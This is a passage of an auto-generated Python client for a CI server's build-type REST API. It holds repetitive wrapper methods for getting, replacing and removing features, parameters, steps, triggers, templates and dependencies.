"""get_example_new_project_description_compatibility_version1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_example_new_project_description_compatibility_version1(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_feature(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def get_feature_parameter(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""get_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_parameter(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
return data
def get_feature_parameters(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_parameters(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def get_feature_setting(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""get_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_setting(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
return data
def get_features(self, bt_locator, **kwargs): # noqa: E501
"""get_features # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_features(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: Features
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_features_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_features_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_investigations(self, bt_locator, **kwargs): # noqa: E501
"""get_investigations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_investigations(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: Investigations
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_investigations_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_investigations_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_metadata(self, path, bt_locator, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_metadata(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str fields:
:param bool resolve_parameters:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_metadata_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_metadata_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter_0(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter_type(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter_type(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: Type
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_type_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_type_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter_type_raw_value(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter_type_raw_value(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter_value_long(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter_value_long(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_value_long_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_value_long_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameter_value_long_0(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameter_value_long_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def get_parameters(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameters(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_parameters_0(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_parameters_0(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_requirement_setting(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""get_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_requirement_setting(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__get_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
return data
def get_root(self, bt_locator, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_root(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_root_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_root_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_settings_file(self, bt_locator, **kwargs): # noqa: E501
"""get_settings_file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_settings_file(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_settings_file_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_settings_file_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""get_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:param str fields:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
return data
def get_snapshot_deps(self, bt_locator, **kwargs): # noqa: E501
"""get_snapshot_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_deps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: SnapshotDependencies
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_snapshot_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_snapshot_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_step(self, bt_locator, step_id, **kwargs): # noqa: E501
"""get_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_step(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__get_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def get_step_parameter(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""get_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_step_parameter(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__get_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
return data
def get_step_parameters(self, bt_locator, step_id, **kwargs): # noqa: E501
"""get_step_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_step_parameters(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_step_parameters_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__get_step_parameters_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def get_step_setting(self, bt_locator, step_id, field_name, **kwargs): # noqa: E501
"""get_step_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_step_setting(bt_locator, step_id, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
else:
(data) = self.__get_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
return data
def get_steps(self, bt_locator, **kwargs): # noqa: E501
"""get_steps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_steps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: Steps
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_steps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_steps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_template(self, bt_locator, template_locator, **kwargs): # noqa: E501
"""get_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_template(bt_locator, template_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str template_locator: (required)
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_template_with_http_info(bt_locator, template_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_template_with_http_info(bt_locator, template_locator, **kwargs) # noqa: E501
return data
def get_templates(self, bt_locator, **kwargs): # noqa: E501
"""get_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_templates(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_trigger(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""get_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_trigger(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str fields:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
return data
def get_trigger_setting(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""get_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_trigger_setting(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__get_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
return data
def get_triggers(self, bt_locator, **kwargs): # noqa: E501
"""get_triggers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_triggers(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: Triggers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_triggers_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_triggers_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_vcs_labeling_options(self, bt_locator, **kwargs): # noqa: E501
"""get_vcs_labeling_options # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vcs_labeling_options(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: VcsLabeling
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_vcs_labeling_options_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_vcs_labeling_options_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_vcs_root_entries(self, bt_locator, **kwargs): # noqa: E501
"""get_vcs_root_entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vcs_root_entries(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootEntries
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_vcs_root_entries_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_vcs_root_entries_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""get_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def get_vcs_root_entry_checkout_rules(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""get_vcs_root_entry_checkout_rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vcs_root_entry_checkout_rules(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def get_zipped(self, path, bt_locator, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zipped(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str name:
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_zipped_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_zipped_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def remove_all_templates(self, bt_locator, **kwargs): # noqa: E501
"""remove_all_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_all_templates(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param bool inline_settings:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__remove_all_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__remove_all_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def remove_template(self, bt_locator, template_locator, **kwargs): # noqa: E501
"""remove_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_template(bt_locator, template_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str template_locator: (required)
:param bool inline_settings:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__remove_template_with_http_info(bt_locator, template_locator, **kwargs) # noqa: E501
else:
(data) = self.__remove_template_with_http_info(bt_locator, template_locator, **kwargs) # noqa: E501
return data
def replace_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""replace_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str fields:
:param AgentRequirement body:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
return data
def replace_agent_requirements(self, bt_locator, **kwargs): # noqa: E501
"""replace_agent_requirements # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_agent_requirements(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param AgentRequirements body:
:return: AgentRequirements
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""replace_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str fields:
:param ArtifactDependency body:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
return data
def replace_artifact_deps(self, bt_locator, **kwargs): # noqa: E501
"""replace_artifact_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_artifact_deps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param ArtifactDependencies body:
:return: ArtifactDependencies
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_feature(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""replace_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_feature(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:param Feature body:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__replace_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def replace_feature_parameters(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""replace_feature_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_feature_parameters(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__replace_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def replace_features(self, bt_locator, **kwargs): # noqa: E501
"""replace_features # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_features(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Features body:
:return: Features
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_features_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_features_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""replace_snapshot_dep # noqa: E501
